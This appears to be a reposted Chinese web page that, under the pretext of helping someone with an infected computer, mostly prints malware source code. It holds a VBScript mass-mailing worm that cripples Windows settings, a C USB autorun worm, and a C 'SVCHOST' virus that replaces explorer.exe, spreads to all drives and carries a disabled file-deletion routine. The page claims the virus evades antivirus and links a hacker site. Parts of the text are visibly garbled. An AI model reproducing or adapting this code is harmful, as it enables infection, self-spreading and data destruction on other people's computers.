电脑中了病毒想从它的或丛逗源代码入手怎么办呢!有我在,下面由我给你做出详细的电脑病毒源代码介绍!希望对你有帮助!
电脑病毒源代码介绍:
电脑病毒源代码一:
on error resume next
set fs=createobject("ing.filesystemobject" '创建一个能与 *** 作系统 沟通的对象,再利用该对象的各种 方法 对注册表进行 *** 作
set dir1=fs.getspecialfolder(0) '获取windows/winnt文件夹位置
set dir2=fs.getspecialfolder(1) '获取system32/system文件夹位置
set so=createobject("ing.filesystemobject"
dim r '定义一个变量
set r=createobject("w.shell"
so.getfile(w.fullname).copy(dir1&"\win32system.vbs" '复制病毒副本到windows/winnt文件夹位置
so.getfile(w.fullname).copy(dir2&"\win32system.vbs" '复制病毒副本到system32/system文件夹位置
so.getfile(w.fullname).copy(dir1&"\start menu\programs\启动\win32system.vbs" '复制病毒副本到start menu启动菜单
'下面是对注册表的恶意修改和简单的依靠oe传播衫卖
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\norun",1,"reg_dword" '修改注册表,禁止“运行”菜单
r.regwrite "kcu\software\microsoft\windows\currentversion\policies\explorer\noclose",1,"reg_dword" '修改注册表,禁止“关闭”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodrives",63000000,"reg_dword" '修改注郑指册表,隐藏所有逻辑盘符
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\system\disableregistrytools",1,"reg_dword" '修改注册表,禁止注册表编辑
r.regwrite "hklm\software\microsoft\windows\currentversion\run\scanregistry","" '修改注册表,禁止开机注册表扫描
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nologoff",1,"reg_dword" '修改注册表,禁止“注销”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\norealmode",1,"reg_dword" '修改注册表,禁止ms-dos实模式
r.regwrite "hklm\software\microsoft\windows\currentversion\run\win32system","win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nodesktop",1,"reg_dword" '修改注册表,禁止显示桌面图标
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\winoldapp\disabled",1,"reg_dword" '修改注册表,禁止纯dos模式
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosettaskbar",1,"reg_dword" '修改注册表,禁止“任务栏和开始”菜单
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\noviewcontextmenu",1,"reg_dword" '修改注册表,禁止右键菜单
电脑病毒源代码二:
r.regwrite "hkcu\software\microsoft\windows\currentversion\policies\explorer\nosetfolders",1,"reg_dword" '修改注册表,禁止控制面板
r.regwrite "hklm\software\classes\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticecaption","警告" '设置开机提示框标题
r.regwrite "hklm\software\microsoft\windows\currentversion\winlogon\legalnoticetext","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
set ol=createobject("outlook.application" '创建outlook文件对象用于传播
on error resume next
for x=1 to 100
set mail=ol.createitem(0)
mail.to=ol.getnamespace("mapi".addresslists(1).addressentries(x) '用于向地址簿的前100名发送此 vbs病毒,可以算是简单弱智的蠕虫了吧~~
mail.subject="今晚你来吗?" '邮件主题
mail.body="朋友你好:您的朋友rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
mail.attachments.add(dir2&"win32system.vbs"
mail.send
next
ol.quit
'下面是对internet explore 选项的恶意修改
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsercontextmenu",1,"reg_dword" '修改注册表,禁止鼠标右键
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowseroptions",1,"reg_dword" '修改注册表,禁止internet选项
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nobrowsersaveas",1,"reg_dword" '修改注册表,禁止“另存为”
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\nofileopen",1,"reg_dword" '修改注册表,禁止“文件/打开”菜单
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\advanced",1,"reg_dword" '修改注册表,禁止更改高级页设置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\cache internet",1,"reg_dword" '修改注册表,禁止更改临时文件设置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\autoconfig",1,"reg_dword" '修改注册表,禁止更改自动配置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\homepage",1,"reg_dword" '修改注册表,禁止更改主页,即“主页”变灰
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\history",1,"reg_dword" '修改注册表,禁止更改历史记录设置
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\connwiz admin lock",1,"reg_dword" '修改注册表,禁止更改internet连接向导
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\securitytab",1,"reg_dword" '修改注册表,禁止更改安全项
r.regwrite "hkcu\software\policies\microsoft\internet explorer\control panel\resetwebsettings",1,"reg_dword" '修改注册表,禁止“重置web设置”
r.regwrite "hkcu\software\policies\microsoft\internet explorer\restrictions\noviewsource",1,"reg_dword" '修改注册表,禁止查看源文件
r.regwrite "hkcu\software\policies\microsoft\internet explorer\infodelivery\restrictions\noaddingsubions",1,"reg_dword" '修改注册表,禁止添加脱机计划
一个c病毒源代码#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>
#include <Dbt.h>
#pragma comment(lib,"shlwapi.lib")
#define TIMER 1//计时器
//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM)//窗口过程
//获取盘符
TCHAR FirstDriveFromMask (ULONG unitmask)
//病毒从U盘培握启动时用到配好庆的函数
BOOL FileExist(TCHAR *path)//测试一个文件是否存在
BOOL GetSelfPath(TCHAR *path)//Get the virus's path
//BOOL FindU(TCHAR *u)//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path)//得到系统路径
BOOL CopyToSysAndSet(HWND hwnd)/袜差/复制自身到系统目录和设置
BOOL SetFileAttrib(TCHAR *path)//设置path所指文件的属性
BOOL RegAutoRun(TCHAR *path)//修改注册表,实现自启动
//从C盘启动时用到函数
BOOL CopyToUAndSet()//复制自己到U盘
BOOL CreateAutoRunFile(TCHAR *path)//在U盘下生成autorun.inf文件
BOOL FindSelf()//测试自己是否在已经执行了
//global variable
TCHAR szExePath[MAX_PATH]//the virus's path
TCHAR U[2]//保存U盘的盘符
TCHAR szSysPath[MAX_PATH]//system path
//constant
const TCHAR *szExeName="bbbbb.exe"
const TCHAR *szSysName="aaaaa.exe"
const TCHAR *szAutoRunFile="AutoRun.inf"
int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
PSTR szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("UUUUUU")
HWND hwnd
MSG msg
WNDCLASS wndclass
wndclass.style =0
wndclass.lpfnWndProc =WndProc
wndclass.cbClsExtra =0
wndclass.cbWndExtra =0
wndclass.hInstance =hInstance
wndclass.hIcon =0
wndclass.hCursor =0
wndclass.hbrBackground =0
wndclass.lpszMenuName =NULL
wndclass.lpszClassName =szAppName
if (!RegisterClass (&wndclass))
{
MessageBox (NULL,TEXT("Program requires Windows NT!"),
szAppName, MB_ICONERROR)
return 0
}
hwnd = CreateWindow (szAppName, NULL,
WS_DISABLED,
0, 0,
0, 0,
NULL, NULL, hInstance, NULL)
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg)
DispatchMessage (&msg)
}
return msg.wParam
}
LRESULT OnDeviceChange(HWND hwnd,WPARAM wParam, LPARAM lParam)
{
PDEV_BROADCAST_HDR lpdb = (PDEV_BROADCAST_HDR)lParam
switch(wParam)
{
case DBT_DEVICEARRIVAL: //插入
if (lpdb ->dbch_devicetype == DBT_DEVTYP_VOLUME)
{
PDEV_BROADCAST_VOLUME lpdbv = (PDEV_BROADCAST_VOLUME)lpdb
U[0]=FirstDriveFromMask(lpdbv ->dbcv_unitmask)//得到u盘盘符
//MessageBox(0,U,"Notice!",MB_OK)
CopyToUAndSet()//拷到u盘
}
break
case DBT_DEVICEREMOVECOMPLETE: //设备删除
break
}
return LRESULT()
}
LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_Create: //处理一些要下面要用到的全局变量
U[1]=':'
GetSysPath(szSysPath)//得到系统路径
SetTimer(hwnd,TIMER,5000,0)//启动计时器
GetSelfPath(szExePath)//得到自身的路径
return 0
case WM_TIMER: //timer message
if(szExePath[0]==szSysPath[0]) //如果是系统盘启动的
SendMessage(hwnd,WM_DEVICECHANGE,0,0)//检测有没有插入设备消息
else
{
CopyToSysAndSet(hwnd)//拷到系统盘并自启动
}
return 0
case WM_DEVICECHANGE:
OnDeviceChange(hwnd,wParam,lParam)
return 0
case WM_DESTROY:
KillTimer(hwnd,TIMER)
PostQuitMessage(0)
return 0
}
return DefWindowProc(hwnd, message, wParam, lParam)
}
TCHAR FirstDriveFromMask(ULONG unitmask)
{
char i
for (i = 0i <26++i)
{
if (unitmask &0x1)//看该驱动器的状态是否发生了变化
break
unitmask = unitmask >>1
}
return (i + 'A')
}
BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录
{
return TRUE
}
else
return FALSE
}
BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH)//得到系统路径
}
BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH]
lstrcpy(szPath,szSysPath)
lstrcat(szPath,"\\")
lstrcat(szPath,szSysName)//得到复制到系统目录的完整目录
if(!FileExist(szPath))//检测系统目录是否已经存在复制的文件
{
CopyFile(szExePath,szPath,FALSE)
RegAutoRun(szPath)
return SetFileAttrib(szPath)
}
else
{
if(!FindSelf())//检测自己有没有运行
{
//MessageBox(0,szExePath,szPath,MB_OK)
WinExec(szPath,SW_HIDE)//没有就执行
SendMessage(hwnd,WM_CLOSE,0,0)//结束自己
}
}
return FALSE
}
BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在
{
int result
result=PathFileExists(path)
if(result==1)
return TRUE
else
return FALSE
}
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN)
}
BOOL RegAutoRun(TCHAR *path)//修改注册表实现自启动
{
HKEY hkey
DWORD v=0
RegOpenKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer",&hkey)
RegSetValueEx(hkey,"NoDriveTypeAutoRun",0,REG_DWORD,(LPBYTE)&v,sizeof(DWORD))
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
&hkey)==ERROR_SUCCESS)
{
RegSetValueEx(hkey,szSysName,0,REG_SZ,(BYTE*)path,lstrlen(path))
RegCloseKey(hkey)
return TRUE
}
else
return FALSE
}
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH]
lstrcpy(szPath,U)
lstrcat(szPath,"\\")
lstrcat(szPath,szExeName)//得到指向U盘的完整目录
TCHAR szAutoFile[MAX_PATH]
lstrcpy(szAutoFile,U)
lstrcat(szAutoFile,"\\")
lstrcat(szAutoFile,szAutoRunFile)
if(!FileExist(szAutoFile))
{
CreateAutoRunFile(szAutoFile)
SetFileAttrib(szAutoFile)
}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE)
return SetFileAttrib(szPath)
}
return FALSE
}
BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件
{
ofstream fout
fout.open(path)
if(fout)
{
fout<<"[AutoRun]"<<endl
fout<<"open="<<szExeName<<" e"<<endl
fout<<"shellexecute="<<szExeName<<" e"<<endl
fout<<"shell\\Auto\\command="<<szExeName<<" e"<<endl
fout<<"shell=Auto"<<endl
fout.close()
return TRUE
}
return FALSE
}
BOOL FindSelf(){
PROCESSENTRY32 pe
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0)
pe.dwSize=sizeof(PROCESSENTRY32)
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szSysName)==0)
{
CloseHandle(hShot)
return TRUE
}
}while(Process32Next(hShot,&pe))
}
CloseHandle(hShot)
return FALSE
}
即使是小病毒也不是太好编的比如用C语言做的小病毒……
功能:
1.在所有磁盘的根目录生成svchost.com和autorun.inf文件
2.生成病毒体:
c:\windows\wjview32.com
c:\windows\explorer.exe
c:\windows\system32\dllcache\explorer.exe
c:\windows\system\msmouse.dll
c:\windows\轮凳陵system32\cmdsys.sys
c:\windows\system32\mstsc32.exe
3.病毒体c:\windows\explorer.exe感染原explorer.exe文件,使其不需要修改注册表做到启动时在
explorer.exe前启动
4.修改注册表,在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
设置自启动项(此 *** 作不使用windowsAPI,防止用户对病毒体的发现,并实现并行执行)
5.生成的autorun.inf改变磁盘的打开方式,使其在windows2000以上的系统无论选择“打开”、“双击”、“资源管理器”等方式都无法打开分驱,而是以运行病毒的方式取而代之。
6.连锁能力,将病毒体相连,实现相连复制更新
7.使用进程不断调用进程,使得在任务管理里无法结束病毒进程
8.不断搜索磁盘,只要发现未感染病毒的一律粗历感染,病毒删除后1秒内再建
9.生成垃圾文件(DESTORY_感染_任意数字)5个于C盘下
10.附带删除文件函数(为防止危害,本函数默认不执行)
本病毒到目前为止任何杀毒软件都无法将其查杀(07年的)
本病毒单机默认使用对机器无害(破坏代码已屏蔽)
提供病毒卸载程序(保存为X.BAT,双击运行即可卸载):
@echo off
echo SK-CHINA SVCHOST KILLER 2007.6
echo WRITE BY S.K
taskkill /im mstsc32.exe /f
del c:\windows\wjview32.com
del c:\windows\explorer.exe
del c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\msmouse.dll
del c:\windows\system32\cmdsys.sys
del c:\windows\system32\mstsc32.exe
del c:\svchost.com
del c:\autorun.inf
del d:\svchost.com
del d:\autorun.inf
del e:\svchost.com
del e:\autorun.inf
del f:\svchost.com
del f:\autorun.inf
del g:\svchost.com
del g:\autorun.inf
del h:\svchost.com
del h:\autorun.inf
copy c:\windows\system\explorer.exe c:\windows\explorer.exe
copy c:\windows\system\explorer.exe c:\windows\system32\dllcache\explorer.exe
del c:\windows\system\explorer.exe
echo FINISH!
echo 如果本次清除后仍残留有病毒,腊戚请再次运行本程序
pause
--------------------------------------------------------------------
核心代码:(全部代码请从附件中下载,请用DEV-CPP运行其中的工程文件,编译后请将结果文件svchost.exe更名为svchost.com,否则本病毒无法发挥作用,请安心运行实验,恶意代码已屏蔽)
/*
SK-CHINA
SVCHOST virus WRITE BY S.K
Compiler:
DEV-CPP 4.9.9.2
*/
/* SVCHOST.C*/
/* SVCHOST.EXE */
/* SVCHOST.COM */
#include<stdio.h>/*标准输入输出*/
#include<string.h>/*字符串 *** 作*/
#include<stdlib.h>/*其它函数*/
#include<process.h>/*进程控制*/
#include<dir.h>/*目录函数*/
#define SVCHOST_NUM 6 /*关键位置病毒复制数量*/
#define RUBBISH_NUM 5 /*垃圾文件数量*/
#define REMOVE_NUM 5 /*删除文件数*/
/*====================================================================*/
/*
文件AUTORUN.INF内容:
1.自动运行SVCHOST.com
2.覆盖默认打开命令,使用病毒体作为新的打开方式
3.覆盖默认资源管理器命令,使病毒体作为新的命令方式
*/
char *autorun={"[AutoRun]\nopen=\"SVCHOST.com /s\"\nshell\\open=打开(&O)
\nshell\\open\\Command=\"SVCHOST.com /s\"\nshell\\explore=资源管理器(&X)
\nshell\\explore\\Command=\"SVCHOST.com /s\""}
/*=====================================================================*/
/*
添加注册表项:
1.自动运行生成病毒体C:\windows\wjview32.com
*/
char *regadd={"REGEDIT4\n\n
[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]\n\"wjview32
\"=\"C:\\\\windows\\\\wjview32.com /s\""}
/*=====================================================================*/
/*
函数:复制文件
复制源:infile
目的地:outfile
成功返回0,失败返回1
*/
int copy(char *infile,char *outfile)
{
FILE *input,*output
char temp
if(strcmp(infile,outfile)!=0 &&((input=fopen(infile,"rb"))!=NULL) &&((output=fopen
(outfile,"wb"))!=NULL))
{
while(!feof(input))
{
fread(&temp,1,1,input)
fwrite(&temp,1,1,output)
}
fclose(input)
fclose(output)
return 0
}
else return 1
}
/*=====================================================================*/
/*
函数:通过explorer自动运行
成功返回0,失败返回1,2
*/
int autorun_explorer()
{
FILE *input
if((input=fopen("c:\\windows\\system\\explorer.exe","rb"))!=NULL)
{
fclose(input)
remove("c:\\windows\\$temp$")
remove("c:\\windows\\system32\\dllcache\\$temp$")
return 1
}
copy("c:\\windows\\explorer.exe","c:\\windows\\system\\explorer.exe")
rename("c:\\windows\\explorer.exe","c:\\windows\\$temp$")
rename("c:\\windows\\system32\\dllcache\\explorer.exe","c:\\windows\\system32
\\dllcache\\$temp$")
if(copy("SVCHOST.com","c:\\windows\\explorer.exe")==0 &©
("SVCHOST.com","c:\\windows\\system32\\dllcache\\explorer.exe")==0)
return 0
else
return 2
}
/*=====================================================================*/
/*
函数:添加注册表项
成功返回0,失败返回1
*/
int add_reg()
{
FILE *output
if((output=fopen("$$$$$","w"))!=NULL)
{
fprintf(output,regadd)
fclose(output)
spawnl(1,"c:\\windows\\regedit.exe"," /s $$$$$",NULL)
}
}
/*=====================================================================*/
/*
函数:复制病毒 + Autorun.inf自动运行
*/
void copy_virus()
{
int i,k
FILE *input,*output
char *files_svchost[SVCHOST_NUM]=
{"svchost.com","c:\\windows\\wjview32.com","c:\\windows\\system\\MSMOUSE.DLL","c:\\windows\\syste
m32\\cmdsys.sys","c:\\windows\\system32\\mstsc32.exe","c:\\windows\\explorer.exe"}
char temp[2][20]={"c:\\svchost.com","c:\\autorun.inf"}
for(i=0i<SVCHOST_NUMi++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input)
for(k=0k<SVCHOST_NUMk++)
{
copy(files_svchost[i],files_svchost[k])
}
i=SVCHOST_NUM
}
}
for(i=0i<SVCHOST_NUMi++)
{
if((input=fopen(files_svchost[i],"rb"))!=NULL)
{
fclose(input)
for(k=0k<24k++)
{
copy(files_svchost[i],temp[0])
if((output=fopen(temp[1],"w"))!=NULL)
{
fprintf(output,"%s",autorun)
fclose(output)
}
temp[0][0]++
temp[1][0]++
}
i=SVCHOST_NUM
}
}
}
/*=====================================================================*/
/*
函数:制造垃圾文件
*/
void make_rubbish()
{
int i
FILE *output
srand(0)
for(i=0i<RUBBISH_NUMi++)
{
int n
char s[30]
n=rand()
sprintf(s,"C:\\DESTORY_感染_%d",n)
if((output=fopen(s,"w"))!=NULL)
{
fprintf(output,"%ld%s",n*n,s)
fclose(output)
}
}
}
/*=====================================================================*/
/*
函数:删除文件
*/
void remove_files()
{
long done
int i
struct _finddata_t ffblk
char *remove_files[3]={"*.txt","*.doc","*.xls"}
for(i=0i<3i++)
{
if(_findfirst(remove_files[i],&ffblk)==-1) continue
while(!done)
{
remove(ffblk.name)
_findnext(done,&ffblk)
}
_findclose(done)
}
}
/*=====================================================================*/
/*
主程序
使用DEV-CPP 32位C工程 实现.C程序脱离命令行界面,于后台执行
*/
int main(int argc,char **argv)
{
int contral=0
if(argc>1)
if(strcmp(argv[1],"/s")==0)
goto next1
autorun_explorer()
spawnl(1,"c:\\windows\\system\\explorer.exe",NULL)
next1:
add_reg()
copy_virus()
make_rubbish()
/* remove_files()*/
spawnl(1,"c:\\windows\\system32\\mstsc32.exe"," /s",NULL)
return 0
}
其他的恐怕只能告诉你网址了
比如黑客联盟的http://www.chinahacker.com/
参考资料: http://hi.baidu.com/wubeip111/blog/item/3f63e20ad515cd1d95ca6bd2.html
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)